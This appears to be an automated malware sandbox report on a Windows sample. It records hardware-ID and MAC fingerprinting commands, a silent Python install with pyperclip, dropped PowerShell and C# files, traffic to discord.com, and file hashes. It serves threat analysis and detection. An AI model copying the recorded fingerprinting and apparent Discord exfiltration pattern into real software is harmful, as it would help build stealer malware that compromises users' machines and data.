C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Users\Admin\AppData\Local\Temp\python-installer.exe
C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe
"C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | www.python.org | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 151.101.192.223:443 | www.python.org | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.192.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_td5nes5k.x1a.ps1
C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1
\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP
C:\Users\Admin\AppData\Local\Temp\RESA875.tmp
C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.dll
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e89c193840c8fb53fc3de104b1c4b092 |
| SHA1 | 8b41b6a392780e48cc33e673cf4412080c42981e |
| SHA256 | 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c |
| SHA512 | 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2 |
memory/4584-116-0x000001C8FF830000-0x000001C8FF880000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e86a2f4d6dec82df96431112380a87e6 |
| SHA1 | 2dc61fae82770528bee4fe5733a8ac3396012e79 |
| SHA256 | dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a |
| SHA512 | 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5 |
C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UseBackup.xlsx
| MD5 | aad09e5816b356fce7964daaec14d955 |
| SHA1 | 1594e6629cdfd7978c48f98456d219e19be227d2 |
| SHA256 | 6ae6c5e94701c9f0bb9930b2c0723e85d1449689c274d607095a6ac9710acacc |
| SHA512 | 064995bf6774f00ba509caaf8a0179f8c1ff431f273c24aaf5c7f48b62a040156f5517347ecd95fde712cf187f6b9221c90607b18fe18cf3b597921eebc005bc |
C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UnlockBackup.txt
| MD5 | be2290f73ddcedef156d4155202f3c20 |
| SHA1 | ea98970dbf35bd3b1b556abdfb09660f1cc08ec9 |
| SHA256 | eb980ff4233547e5488beb4e58685c2998ef0fd1909674c82ff2285a0b83c567 |
| SHA512 | 05d0d0d6df69e311f73c1d7cfb35279c2b696105cbdc115f43f98466c5cf030d2be31d76104b70456933f2b03bac74b1294dac8937f922190747f88953e686a9 |
C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\BackupStart.csv
| MD5 | 6babe9070e590172a9797afb604cfb90 |
| SHA1 | c8aac29f9220e399a829fb02b07c66396481bc82 |
| SHA256 | 72bf9fb0dfb94a02559b2be4519178ceb1bb63b837b7cb0a7d8192154a0622ad |
| SHA512 | 5190ebedd44ed2e31dbba51d12d911ec56102c8b3853698bad46a1c6e9608b336588aa1ee91954c237fc4bb1e58418d1f280e41737e4f1d24eb58b1bfa935548 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7bde4b527f6c280b58f471b90da7fac8 |
| SHA1 | d5b685a260a01dd33f8732c8cbc976b2989f6188 |
| SHA256 | 38ad355760e10eabaa9a9f00436975e1c1e1323e383412abdb108f2980cc7911 |
| SHA512 | c2d95bf41e99e07f77a49be23bc143a785a5544474cf6c40e4d93b89d48e25afb36964368f3c5aedb5d253cb3debe5ed4b08ce3e8d955d0758cfb744f3535a6c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fa62682ae5c4db5ff5c8081be40619a3 |
| SHA1 | c8492e65565a2bf0913cf501fbd4109e22f32ef3 |
| SHA256 | 044ae72c1d6bd0d35731d675cad25040163bc0d06970772bd7b04e79b7b7618a |
| SHA512 | fa940f723775420022e5f58e276d8f5ddba51dbe17a7227ab349a34498e687bb1159d0615a17a68d1a5416cc0c103951bdb05856dd984856703f16733bd8b5fd |
C:\Users\Admin\AppData\Local\Temp\python-installer.exe
| MD5 | d8548aa7609a762ba66f62eeb2ca862d |
| SHA1 | 2eb85b73cab52693d3a27446b7de1c300cc05655 |
| SHA256 | 5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a |
| SHA512 | 37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c |
C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe
| MD5 | 931227a65a32cebf1c10a99655ad7bbd |
| SHA1 | 1b874fdef892a2af2501e1aaea3fcafb4b4b00c6 |
| SHA256 | 1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d |
| SHA512 | 0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507 |
C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\PythonBA.dll
| MD5 | 8c8e5a5ca0483abdc6ad6ef22c73b5d2 |
| SHA1 | 9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc |
| SHA256 | edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43 |
| SHA512 | 861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157 |
C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\SideBar.png
| MD5 | 888eb713a0095756252058c9727e088a |
| SHA1 | c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4 |
| SHA256 | 79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067 |
| SHA512 | 7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0 |
C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\pip_JustForMe
| MD5 | 494f112096b61cb01810df0e419fb93c |
| SHA1 | 295c32c8e1654810c4807e42ba2438c8da39756a |
| SHA256 | 2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80 |
| SHA512 | 9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704 |
C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe
| MD5 | f6ddadd0d817ce569e202e57863ae919 |
| SHA1 | 3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2 |
| SHA256 | 63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1 |
| SHA512 | 7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2 |
C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe
| MD5 | fd7e13f2c36fe528afc7a05892b34695 |
| SHA1 | 14a9c4dfd12e1f9b1e64e110166500be1ef0abb1 |
| SHA256 | 2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0 |
| SHA512 | 7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f |
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_000_core_JustForMe.log
| MD5 | 9f190f62aace0367c91a959cc11ea7db |
| SHA1 | df84e4a53a2d563fee16f1aadb04972ea4307a8e |
| SHA256 | 154b0f66e674f0280637d37b66c4b89e5bfd8ecd81441bf9d0f567266c39288d |
| SHA512 | 55b7040a6d86b5b4a0a6fe06071a712242b9ace0f29431621ec81c382e4f52a35bb79b6d995a7e19c9770436e5531db03475f5d4331eeb4f4d355a2175e6955e |
C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi
| MD5 | d4c1f834f30032f220409a17e0f688cd |
| SHA1 | 61dc90b164c3797456a8ed775b353a087054fd0f |
| SHA256 | 675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12 |
| SHA512 | b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f |
C:\Config.Msi\e57de3d.rbs
| MD5 | 48a46d6b43040711c0339edd00fc86a5 |
| SHA1 | f9216314a251fa6d35004b4c4092fd533259f0ee |
| SHA256 | 4241d8b5549ca50e0072e81c527f094f37f3e7f467654fe73d794b20c12e9fb4 |
| SHA512 | 4d84d96dfa0f365ef905c519301110428d162d43c0b0dabfe3525c44f2a4f516dbc267070957ce6bbda441b5e33aa75f97c864a1dda097fd533d5916d0f680b5 |
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_001_exe_JustForMe.log
| MD5 | ff82da4f8a0c5548cc732f210c8b52b8 |
| SHA1 | 2e05b46beae3f3ae7cbdfa43b7f2cac790b014e6 |
| SHA256 | 8a102c85ee623ee6710178fa0af65611b668758ccb3314c0a9ce141aa6929652 |
| SHA512 | 57ea4ddfd570c901c0e751cdc7dbf91a0767086baf3e3d069d79e0e02de94078cd6ae89ee434c773b45c12fb044b494242e8e4262de8af589e4f9af7f6854b83 |
C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi
| MD5 | 2db9e147e0fd938c6d3c1e7cf6942496 |
| SHA1 | e4333f4334b5df6f88958e03ad18b54e64a1331f |
| SHA256 | 9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab |
| SHA512 | 4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 02:47
Reported
2024-11-04 02:50
Platform
win7-20240903-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"